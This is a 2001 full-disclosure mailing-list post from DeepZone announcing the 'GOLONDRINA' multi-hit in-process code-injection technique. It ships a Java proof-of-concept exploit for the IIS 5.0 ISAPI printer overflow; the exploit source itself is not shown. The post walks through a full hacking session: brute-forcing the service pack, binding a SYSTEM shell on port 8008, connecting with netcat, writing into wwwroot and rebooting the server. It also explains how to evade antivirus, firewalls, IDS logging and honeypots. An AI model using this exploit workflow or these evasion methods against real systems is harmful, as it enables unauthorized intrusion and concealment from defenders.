[DeepZone Research] It's time to disclose GOLONDRINA Anarchy (draft + exploit included!)

["|Zan" <izan () deepzone org>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


This post contains a draft + exploit (attached) describing an alternative
approach to break in NT-b0fs. Proof of concept exploit breaks in Windows 2000
sp0/sp1.

A lot of information is pointing to "NT-b0f researchers".

Some "sections" can be good stuff for IDSers and honeypoters.

Pen-testers can test exploit getting OS fingerprints with DeePo.

Microsoft and friends can read our "Ethical compromise or dancing with the most
sexy company ..." section in Draft.

Draft contains "ASCII ART". If you have problems viewing this paper you will
find a copy at ...

http://www.deepzone.org/quick.asp?link=golondrina

Finally notice the early stage of development. It can be unstable code but proof
of concept exploit is working very fine in our computers (lab environment).

In our opinion GOLONDRINA gives us a new perspective and more possibilities of
intrussion having important consecuences in traditional and common defense-
techniques ...

regards,
|Zan


- -----


2001/12/22



        --==[ Uploading code IN-PROCESS - CodeName: GOLONDRINA! ]==--

             DeepZone Digital Security - http://www.deepzone.org

                        by |Zan <izan () deepzone org>



                             -----------------


                     "Volverán las oscuras golondrinas
                   en tu balcón sus nidos a colgar,
                   y otra vez con el ala a sus cristales
                            jugando llamarán.

                      Pero aquellas que el  vuelo refrenaban
                   tu hermosura y mi dicha a contemplar,
                   aquellas que aprendieron nuestros nombres ...
                            ¡esas... no volverán!."

                                        ....

                      Gustavo Adolfo Bécquer (1836-1870)



                             -----------------



About this draft!
- -----------------

This post is carrying a remote exploit to W2k/IIS 5.0 sp0 and sp1. This "toy"
is only proof of concept code showing an "Uploading code IN-PROCESS" basic
implementation - A.K.A *GOLONDRINA* technique - on NT servers. In fact, this
exploit is abusing an "old" vulnerability discovered by eEye months ago. [2]

This vulnerability was named "Remote IIS ISAPI Printer Extension Buffer
Overflow" and i'll try show adventages and disadventages exploiting this
vulnerability with GOLONDRINA technique in mind.

People running only exploits or pen-testing networks will see that this exploit
*ONLY* binds a remote shell on 8008 port. Actually "single-hit" exploits exist
and they get same effect in a more safe way. I am presenting this exploit like
an "alternative" on traditional exploitation ways although i am studying its
behaviour yet. It can be seen like work-in-progress.

I choose "Remote IIS ISAPI Printer Extension Buffer" vulnerability only like a
typical commercial code to exploit. Golondrina technique is quite general and it
was tested on products with bof problems like iPlanet, IIS, ZBServer ... and
results were *very good*. New problems arisen but a lot of common and
traditional problems exploiting bofs dissapear.

This post isn't a full detailled paper. It is only a draft with my progress and
ideas searching feedback and valuable comments. I am going to try a readable
style where my "fantastic english" doesn't generate a lot of noise.


Ethical compromise or dancing with the most sexy company: Microsoft!
- --------------------------------------------------------------------

Before i begin to outline some new problems and real impact with Golondrina
exploits i'd like spread some words about BugTraq community, full-disclosure,
some commercial groups and the most important: our old *exiled* but not
forgotten fellows.

Sometimes when i am reading BugTraq i can see a lot of people arguing about non
very important things closed to authentic security and bugs impact. Sadly, i am
seeing a lot of commercial people/vendors/security firms crying about exploits
released by individuals or non-profit organizations.

I'd like to remember them where they are: a free full-disclosure list. This is
not the right place to show indignation spamming another readers and generating
a cycle-war with cross-postings.

In this post i am not going to argue about full-disclosure with white-hats,
black-hats, kiddies, lamerz ... or any electronic tribe. In mi opinion i am
going to write about a *very old and public* bug with a lot of patches and
updates availables.

In the another hand this vulnerability is only a launch-pad to show a general
and portable bof technique. This post point to free underground people and
security researches. Target is feedback and communication sharing ideas and
work.

If you only want to argue about full-disclosure then you can try to mail to
Scott Culp with a proper subject ... mmmm ... "It's Time to End Information
Anarchy" can be a good subject to obtain his attention ... or not!.

If we win friends like "Microsoft Security Response Center" (writing spam and
innocent bulletins on BugTraq) and we lose more old and good friends like "Teso
Team" and another BugTraq's "exiled" friends then i'd like to know what's
happening here and if BugTraq and the Underground Security Comunity are being
infected by Microsoft and the war by "third partys" to get "security bussiness".

Well, previous lines are only my personal opinion about how commercial world can
*kill our public knowledgement source and our main way to share it* ...

It's time to dance with the most sexy company today ... Microsoft!


Uploading code IN-PROCESS - CodeName: GOLONDRINA!
- -------------------------------------------------

Actually bofs can be observed like two differents parts: injector + payload. If
it is a friendly b0f then you can exploit it with a single-hit exploit
containing injector + payload and gaining full control over remote process (this
is the most common way!)

If it isn't a friendly b0f then you can elaborate a more general injector,
download your payload to disk and then execute it.

Both techniques have pros and cons: portability, reusability, very noisy
intrussion ...

I have been working on another "general technique" last months: GOLONDRINA
technique.

Since a theorical perspective it can be described like a very elaborated and
multi-part injector taking any general payload like a "component" or "object".

In this context "injector" is formed by different functional components and they
work several times along the intrussion:

        - LOCATOR. Work on relocatable code proportioning independence and
                   fixing offsets and deviations.

        - PATCHER. Store pointers, API addresses (avoid page faults in process).

        - ALLOCATER. Allocate functional "code bags". Stealth & Evasion.

        - COPYER. Re-generate original payload (decrypt. and sync. hits).

        - JUMPER. Obtain main "code bag" and execute original payload.

Payload has to be relocatable code. Payload gives us its work and return
control. It can be seen like an object or component with a method only.

We can say that GOLONDRINA technique takes control over remote overflow with
secuential hits connecting on trusted ports. Each hit overflows a single
thread, makes its work and keep living remote software. Hits are sequentials but
they can take control on any time. Simultaneus hits (multithread attack) are
possible too. Sync. and delays are VERY important!

In a nutshell, GOLONDRINA exploits can inject tiny slices of relocatable code in
vulnerable process avoiding some traditional limitations and providing
opportunities to pre-fabricated code and abstraction. Like we are going to see
it gives us a fantastic power to build very elaborated payloads kicking
traditional protections like Antivirus, some IDS's heuristics or firewalls.


Old and new problems found and "solved"!
- ----------------------------------------

In this "section" i am going to outline some common problems with possible
solutions and how they were solved in my proof of concept implementation. I only
am outlining the most quick path with a BASIC implementation.


Tiny Buffers or very long payloads ?
- ------------------------------------

Actually if we find those problems then we run a different approach (an injector
downloading and executing payload is a good solution) but if buffer is very tiny
we get troubles downloading that code (not enought space to code a minimal
downloader).

GOLONDRINA fights with those problems generating slices and sending the
appropiate injector along the intrussion with each slice. Each slice can contain
code, data, another shrunk injector ... It lets to exploit the vulnerability
avoiding size restrictions. Exploiter chooses the "exploitation block" and
exploit calculate number of hits and makes dirty job.


Note:
        Injector (m types) -> (p <= m)
        n*slice = original payload


cheap ASCII art
- ---------------

injector(type 1) + slice = hit 1 ---
                                    |
injector(type 2) + slice = hit 2 ---
                                    |
injector(type 2) + slice = hit 3 ---            |F|
                                    |           |i|
injector(type 2) + slice = hit 4 ---            |r|
                                    |   trusted |e| port
        .........                       ------> |w| ----> (Buggy Application)
                                    |           |a|
injector(type 3) + slice = hit x ---            |l|
                                    |           |l|
        .........
                                    |
injector(type p) + slice = hit n ---



Abstraction & Object Oriented Exploits
- --------------------------------------

GOLONDRINA exploits can join several hits and rebuild original payload in a
remote overflowed process. It lets build components or abstract payloads. I am
speaking about pre-fabricated code. Some examples can be: Writing a file to
disk, hashes-dumper or a remote-shell.

Reusing code or porting tools in "components or payloads" is possible (think
that it isn't very usefull!).

Another possibility is "components-chainning" (DumperHashes+WriteToDisk). It is
possible but it is innecesary if you get a full intrussion.

In my example exploit i ran our "Rapid Exploit Development tool" (RED tool) to
get a pre-fabricated component: a remote shell on 8008 port [3]. This "cheap
toy" was released a year ago exactly. In this moment we have tracked 5 remote
SYSTEM exploits with this tool. Some exploits tracked over BUGTRAQ running this
tool are affecting to IIS, Check Point Firewall-1, Compaq Insight Manager and
LiveStats.

When anybody can build a "10 minutes exploit" then we start to kill "0-day
exploits" and "trading" ...


Downloading & executing code vs. Uploading code IN-PROCESS
- ----------------------------------------------------------

Downloading & executing code is a "very safe" way to take control. It needs
(generally) a single-hit exploit with a back-connection, and then a general-
payload is downloaded & executed.

Uploading code IN-PROCESS handles another concept. You can run this technique if
you don't want a "very noisy" intrussion in OS. It gives you opportunities to
bypass any potential problem abusing a trusted process. Imagine, for example,
the next scenaries:

        - "They" have an antivirus installed.

        Downloading & executing you are creating a new process. Antivirus can
        hook&check that new image being loaded from hard disk.

        Uploading IN-PROCESS you are smashing a trusted process. It isn't going
        to be checked each 10 minutes - of course - to see if it has being
        infected.


        - Router, Firewalls ...

        If you download a payload you create an outgoing connection. It can be
        filtrated in a very hostile environment.

        Uploading IN-PROCESS you talk to trusted ports. You can launch each hit
        through of several and different proxys *at different times*!!!! (it's
        only a very extreme example!).


Another situations are possible.


Old technology become new stuff ...
- -----------------------------------

What is a virus ? ... yes, it is a cycle-code and relocatable. Generally they
takes a tiny size (2k-3k). In theory they can be imported with a correct
"exploitation block" on GOLONDRINA exploits avoiding null bytes and
restrictions.

Note that it'd generate quite slices and it'd have to be mutate previously.

A lot of compression engines and another fantastic resources are availables in
viral technology ... they only need tiny mutations and they run very fine. Can
you imagine a very high ratio compression in assembly? ... mmmm ... 10:1 would
be enough to provide a lot of "features" ...


Brute-forcing. What Service Pack is installed ?
- -----------------------------------------------

A traditional problem in b0fing happens when you don't know the correct service
pack. You don't know the offsets or valid values then your exploit fails ...

Although the next technique can be usefull on single-hit exploits i designed it
to avoid remote server crashes on GOLONDRINA exploits.

Some fantastic exploiters released some exploits overwritting exception frames
... but ... why we're overwriting them when we can abuse them too ?

If you inoculate or upload a first "test slice" you can adivinate what service
pack is being ran. If it fails then exception frame can catch your fault and
your Remote-IPC component don't return the correct reply.

The previous lines are only an example. It is code dependent but fortunately
there are another ways.

In attached exploit you can see like brute-forcing is possible. I abuse an IIS
exception frame previously installed. If server is handling n-threads then
exploit will freeze one thread with each unsucessfully bruteforce test. Actually
i test 2 enviroments (Win2k server sp0 & sp1) so if sp1 is installed exploit'd
work with (n-1) threads availables.

Think that brute forcing is only implemented like proof of concept working very
good. In a real attack we'd receive a nmap scan or similar.


NULL and problematic bytes, printables shellcodes ?
- ---------------------------------------------------

NULL and problematic bytes stop a lot of times our payloads on a single-hit
exploit. Writing 2k of code worried about printable style isn't a good solution.

When you have a look in my GOLONDRINA exploit you can see that a multi-part
injector is relatively short in size. A printable multi-part injector is
possible.

Payloads aren't a problem. You can fit them with a good "exploitation block"
encoding (XORing for example) each hit with a different stealth. In this way
each slice can contain valid and printables bytes landing in a valid printable
scale.

Think that a good programming style avoid problems and the previous lines are
only possible in theory.


Killing emulators and virtualization monitors! - (stuff to hpoters/IDSers ;)
- ----------------------------------------------------------------------------

HoneyPots are on fashion. A lot of people is playing with plex86, VMWare ... and
a lot of similar software catching malware. Some traffic analyzers can save and
rebuild on-fly exploits and more.

There are some good implementations around underground to kill some well-know
virtualizators or detect anomalous "response-times".

GOLONDRINA gives us "lightweight status exploits" in-process. Notice that if you
implement "component-chainning" or run a previous "killer-slice" you can detect
(sometimes kill) this software *compromising only* some code and stopping your
exploit in an early exploitation stage. Then you can send any garbage data or a
false payload to remote software reversers. Who's the honeypoter then ? ... a
lot of possibilities.

Notice that analyzer software rebuilds payloads tracking a TCP/IP connection,
generally a single-hit exploit. It's different with only same GOLONDRINA attack
generating multiples connections from one or differents IPs at different times.
In theory you can store a portion of your payload on victim process and the next
days inject more code (different attack or infection stages) although it isn't
very practical way but theorically it is possible if server isn't restarted
along some time.

For example:

        15:23 am 21/february/xxxx => first hit  (killer-slice. It isn't a VM!)

        18:24 pm 21/february/xxxx => (n-1) hits (payload has been inoculated!)

        13:38 pm 30/february/xxxx => last hit   (we take control!)

If IDS logs are removed every week when we take control 30/february (9 days
later!) they can have a lot of problems to rebuild our attack getting our
payload & exploit. It's only an example of course ;)


Keep living the server!
- -----------------------

Actually if you take full control over remote process you haven't any problem to
keep living the server.

IISPrnIsapi exploit don't abuse IIS's automatic restart. If that "feature" is
deactivated exploit will continue working. In example you can see like the word
"Micros0ft" lives along the hack while i don't force a reboot


IISPrnIsapi: A GOLONDRINA exploit!
- ----------------------------------

When we overflow IIS then a stack overflow appears on *420* characters aprox. I
choose an "exploitation block" about 180 bytes along different stages.

Notice the different sizes: 180 <<< 420.

Exploit can be configured in two modes:

- - Default Mode. *SPANISH VERSION* only.

- - Custom Mode Attack. International version.


[*] "Default Mode"

You have to set "customAttack" to "false" (line 22).

It works on Windows 2000 Server Spanish edition. This configuration shows like
brute forcing is possible.

Next, i am going to write is a hacking session where you'll see exploit running.
Exploit was coded in Java so it'll run in any JVM-aware (Windows, Solaris, Linux
...). Attack is launched against a Windows 2000 Spanish Server/IIS5.0 running an
unknown service pack.


- -- begin hacking-session



* Step 1 - we take a Windows 98 SE client running Sun's JVM with netcat!


Microsoft(R) Windows 98
   (C)Copyright Microsoft Corp 1981-1999.

C:\WINDOWS>cd c:\DeepZone

C:\DeepZone>javac IISPrnIsapi.java

C:\DeepZone>java IISPrnIsapi

(c) 1998-2001 DeepZone. IISPrnIsapi Class coded by |Zan [@deepzone.org]

Example: java IISPrnIsapi victim [port]

Error: need a hostname!



* Step 2 - attack is tested over a LAN with '80' like default port!


C:\DeepZone>java IISPrnIsapi 192.168.xxx.xxx

(c) 1998-2001 DeepZone. IISPrnIsapi Class coded by |Zan [@deepzone.org]

Example: java IISPrnIsapi victim [port]


:. Default mode activated ...


[*] Trying Win2k Server SP0 - Spanish Edition!

Checking OS ... IIS/5.0 detected!
Patching Server ... OK
Vulnerable Server ... NOT detected!


[*] Trying Win2k Server SP1 - Spanish Edition!

Checking OS ... IIS/5.0 detected!
Patching Server ... OK
Vulnerable Server ... detected!
Allocating memory (16k) ... OK
Binding shell on port 8008 (be patient!) ... OK

C:\DeepZone>


Notes:

        - First test show an innocent error dialog box but server continue
          living (it isn't restarted)

        - Second test detect a vulnerable server (it returned Micros0ft) and
          allocate 16k memory!!!. I only need over 1'5k but i wanted to test
          what i could inoculate viruses. 16k is a very large size and it
          worked very fine.

        - When it binds a shell it is uploading a component IN-PROCESS (you
          are working always with legal-connections against a trusted www port).

        - If you want to connect with that remote console you need a
          non-firewalled 8008 port.


* Step 3 - Server is our friend and it's ok


C:\DeepZone>nc 192.168.x.x 80
GET /default.asp

<html>
<head>
        <title>Working and fly out pages very fine!</title>
</head>

<body>

        .......


C:\DeepZone>



* Step 4 - Server was brute-forced!


C:\DeepZone>nc 192.168.x.x 80
DeepZone

HTTP/1.1 400 Peticion incorrecta
Server: Micros0ft-IIS/5.0
Date : Sat, xx yyy tttt 14:09:13 GMT
Content-Type: text/html
Content-Length: 80

<html><head><title>Error</title></head><body>El parametro no es correcto ...


Note:

        - I sent a wrong request. WWW returned its hacked header containing
          a ZEROE in Micros0ft.



* Step 5 - Get in with SYSTEM privileges if you wish!


C:\DeepZone>nc 192.168.x.x 8008

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>cd c:\inetpub\wwwroot

C:\Inetpub\wwwroot>echo Write test>izan.asp

C:\Inetpub\wwwroot>type izan.asp
Write test

C:\Inetpub\wwwroot>



* Step 6 - While hack is realizated WWW fly out pages too!

(Another command.com in my client)


Microsoft(R) Windows 98
   (C)Copyright Microsoft Corp 1981-1999.

C:\WINDOWS>nc 192.168.xxx.xxx 80
GET /izan.asp
HTTP/1.1 200 OK
Server: Micros0ft-IIS/5.0  <--- ZERO continues present!

...

Cache-control: private

Write test

C:\WINDOWS>


* Step 7 - We are SYSTEM and we're going to reboot the MACHINE!


C:\Inetpub\wwwroot>net users

Cuentas de usuario de \\XXXXXX

Administrador   Invitado        IUSR_XXXXXX     ...


C:\Inetpub\wwwroot>iisreset/reboot



* Step 8 - All is ok, Micros0ft become Microsoft and Bill is a happy guy again!


Microsoft(R) Windows 98
   (C)Copyright Microsoft Corp 1981-1999.

C:\WINDOWS>nc 192.168.xxx.xxx 80
GET /izan.asp
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0  <--- ZERO dissapeared }:)

...

Cache-control: private

Write test

C:\WINDOWS>


- -- end hacking-session




[*] "Custom Mode Attack"

You have to set "customAttack" to "true" (line 22).

Then you can run any debugger or "DeePo" (an IISPrnIsapi's companion tool).

Like i told this exploit launch some hardcoded values in the first steps. It was
a design compromise. Idea was test portability in remote-components and show
potential problems with their adventages/disadventages.

Normally anybody can set up a debugger and get those values but if you have
problems getting that system-fingerprint you can run this tool. It is assembly
code simulating an easy and cheap debugger over a C-skeleton. It'll give you a
printable system-fingerprint. Later, you can change or add your fingerprint in
exploit and pen-test your systems.

"DeePo" only was tested over Win2k Server and Advanced Server - Spanish version.
It should work in any language. Exploit don't need really all those data from
your system but since that i unknown if your OS version can change more settings
or critical values i had to cover all possible ways.


Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\>cd deepzone

C:\DeepZone>deepo c:\winnt\system32\inetsrv\inetinfo.exe

(c) 2001 DeepZone - Digital Security. DeePo v0.1.

 Coded by |Zan <izan () deepzone org> - http://www.deepzone.org

 Syntax: deepo [path to inetinfo.exe]

 (Ex: deepo c:\winnt\system32\inetsrv\inetinfo.exe)


                -------------------------------


[*] Dumping IISPrnIsapi's fingerprint ...


        -----------------------------------------------

        0xcb, 0x4a, 0x33, 0x6c, 0x00, 0x00, 0x00, 0x00,
        0x6a, 0x46, 0xe8, 0x77, 0x90, 0x3d, 0xe8, 0x77,
        0x54, 0x74, 0x35, 0x6c, 0xad, 0x89, 0x99, 0x98,
        0xe5, 0x89, 0x99, 0x98

        -----------------------------------------------


C:\DeepZone>


Import this fingerprint in IISPrnIsapi's code. Instructions contained in source
code and comments.


Problems running IISPrnIsapi
- ----------------------------

Exploit contains a "DELAY_SECONDS" value. You can modificate this value to get a
new sync. value. If exploit fails you can set this value to 30 and run it again.
Be patient.

When you connect with the remote shell you need a plain-text client like netcat.
Some Microsoft's telnet clients won't work.

You can see more information about problems and solutions on "References"
section.

In any way, exploit can fail. It's only proof of concept and run very fine on
our test computers.



References
- ----------

[1] DeepZone's GOLONDRINA (news, updates, DeePo, fingerprints ...)

http://www.deepzone.org/quick.asp?link=golondrina


[2] eEye's advisory

http://www.eeye.com/html/Research/Advisories/AD20010501.html


[3] DeepZone's Win32 ShellCode Generator (RED tool) & example exploits

http://www.deepzone.org/quick.asp?link=w32scgen


[4] Microsoft Security Bulletin

http://www.microsoft.com/technet/security/bulletin/MS01-023.asp


[5] Microsoft Windows 2000 Server and Advanced Server's patches

http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29321


[6] Microsoft Windows 2000 Datacenter Server's patches

Patches for Windows 2000 Datacenter Server are hardware-specific and available
from the original equipment manufacturer.


GOLONDRINA FEEDBACK & COPYHACK
- ------------------------------

Researching new techniques on NT is a quite difficult thread. We aren't
searching comparatives with single-hit exploits (more stables) or problems
running this exploit. Our objective is to get progress trying to track new
fingerprints giving a new general attack vector. If you want to help us you can
send *tested and running* fingerprints at contact () deepzone org. They will be
published with your e-mail or any contact data if you wish it.

Before you send your fingerprints you can want to check if some fellow send the
same fingerprint. In that case send us your fingerprint ONLY if your OS version,
languaje and service pack don't match with that fingerprint. It can be that
several fingerprints match on different platforms.

Feedback, good or bad testing will be appreciated but please you don't ask me
about illegal activities or if i can help you with basic exploit coding.

I have waste precious time building 'DeePo' and building this overview-draft.
I am sure that some people can obtain here some good information but feedback is
the only way to get more and better information helping full-disclosure. Send us
your impressions and "experiences" (electronic experiences of course ;).

This paper was written in a technical/non-technical way to reach more people so
if you want to distribute this paper you have to do it freely. Closed bulletins
or paid-services aren't the correct way but if you have a commercial site where
you are getting money and you want to spread this information you can do it ONLY
WITH OUR PREVIOUS CONSENTIMENT in a free way. Feel free to contact us in anyway!

Remember, this information and source code associated is provided "as is". You
can read and run this code in your own risks without any warranty. I can't
guarantee that source code with this documentation match exactly what is
described, nor can i insure that it's fully stable in your system. In other
words this information should be considered as "work in progress".

Hack isn't the exploit ... hack is GOLONDRINA itself!


About DeepZone - Digital Security!
- ----------------------------------

DeepZone - Digital Security! is a european group researching about computing
and security. Actually we are developing in Spain.

We can be contacted at contact () deepzone org

Our Inet's website can be reached at http://www.deepzone.org

Unstable GOLONDRINA stuff is maintained at

http://www.deepzone.org/quick.asp?link=izan


Greetings & Acknowledgments!
- ----------------------------

As readers of "Greetings & Acknowledgments" sections are well aware, writing a
non-profit draft is never an effort undertaken solely by the authors.

I'd like to greet all our friends in 29A! The best international viruXers group.

All new international friends and groups contacting us last years and keeping
*very good* communications about hacks, NT stuff and more!

All security team at eEye.com releasing this vulnerability in a full-way and
giving us a commercial & common software bug to release our new and public
intrussion's techniques.

Good researchers: Jack Barnaby, Greg Hoghlund, Joey__, David Litchfield ... and
more.

The entire crew at DeepZone.org (^Anuska^, Nemo and TheWizard).

Every person who sent in bouquets and brickbats any feedback or greetz. All
these people deserve much thanks and credit.

Finally, as always, i'd like to offer my largest thanks to my inspiration
designing GOLONDRINA, Sandra, the most important hacker in my life. My soul
mate.


- --] EOT


-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>
Comment: http://www.deepzone.org/quick.asp?link=izan

iQA/AwUBPCTNWUaVob5q1uFzEQKuXQCfQQCob856UoCFkqL3xzrzZ8iu+YQAoKyV
C8zNwtlG80zZ/NpjUQbDyww+
=4tEX
-----END PGP SIGNATURE-----

Attachment: IISPrnIsapi.java
Description: